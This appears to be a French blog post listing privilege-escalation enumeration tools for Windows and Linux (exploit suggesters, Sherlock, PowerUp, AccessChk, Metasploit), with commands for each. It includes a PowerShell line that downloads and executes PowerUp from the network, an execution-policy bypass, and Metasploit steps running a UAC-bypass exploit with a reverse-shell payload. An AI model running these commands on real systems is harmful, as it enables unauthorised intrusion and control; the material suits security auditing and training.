Outils d'analyse pour l'escalade de privilèges sur systèmes Windows et Linux

Analyse des vulnérabilités avec Windows-Exploit-Suggester

Cet outil permet d'identifier les vulnérabilités exploitables en se basant sur les enformations système fournies par la commande systeminfo.

python windows-exploit-suggester.py --database 2023-12-14-mssb.xls --systeminfo sysinfo.txt

Lien vers le dépôt : Windows-Exploit-Suggester

Détection sur Linux avec linux-exploit-suggester

Script shell qui analyse le noyau et les binaires installés pour suggérer des vecteurs d'attaque potentiels.

chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh

Lien vers le dépôt : linux-exploit-suggester

Recherche de vulnérabilités avec Sherlock (PowerShell)

Outil PowerShell pour énumérer les correctifs manquants et les failles de configuration courantes.

Import-Module .\Sherlock.ps1
Find-AllVulns | Select-Object CVE, Title, Severity

Lien vers le dépôt : Sherlock

Vérification via Metasploit Framework

Utilisation des modules post-exploitation pour l'énumération et la suggestion d'exploits.

# Énumération des correctifs installés
meterpreter > run post/windows/gather/enum_patches

# Suggestion automatique d'exploits locaux
msf6 > use post/multi/recon/local_exploit_suggester
msf6 > set SESSION 1
msf6 > set SHOWDESCRIPTION true
msf6 > run

# Exemple d'utilisation d'un exploit suggéré
msf6 > use exploit/windows/local/bypassuac_dotnet_profiler
msf6 > set SESSION 1
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > run

Audit avec PowerUp (PowerShell Empire)

Suite de fonctions pour détecter les mauvaises configurations permettant l'escalade.

Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PowerUp.ps1
Invoke-AllChecks -CheckAll | Out-File -FilePath audit_results.txt

# Alternative téléchargeant le script directement
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/PowerTools/master/PowerUp/PowerUp.ps1')
Invoke-PrivescAudit -HTMLReport

Analyse des autorisations avec AccessChk (Sysinternals)

Outil en ligne de commande pour inspecter les permissions sur les fichiers, clés de registre et services.

# Vérification des droits d'écriture sur un répertoire
accesschk.exe -wvu "C:\Program Files" 2>nul | findstr "RW"

# Audit des services vulnérables
accesschk.exe -uwcqv "Authenticated Users" * | findstr "SERVICE_ALL_ACCESS"

# Recherche de clés de registre accessibles en écriture
accesschk.exe -kvuws "Everyone" HKLM\SOFTWARE 2>nul | findstr "KEY"

Ces outils couvrent les principales techniques de détection pour l'analyse de configuration et la recherche de vecteurs d'escalade de privilèges.

Étiquettes: privilege-escalation windows-security linux-security metasploit power-shell

Publié le 5 juin à 00h52

Étiquettes Populaires

©2026 L'Atelier Monstre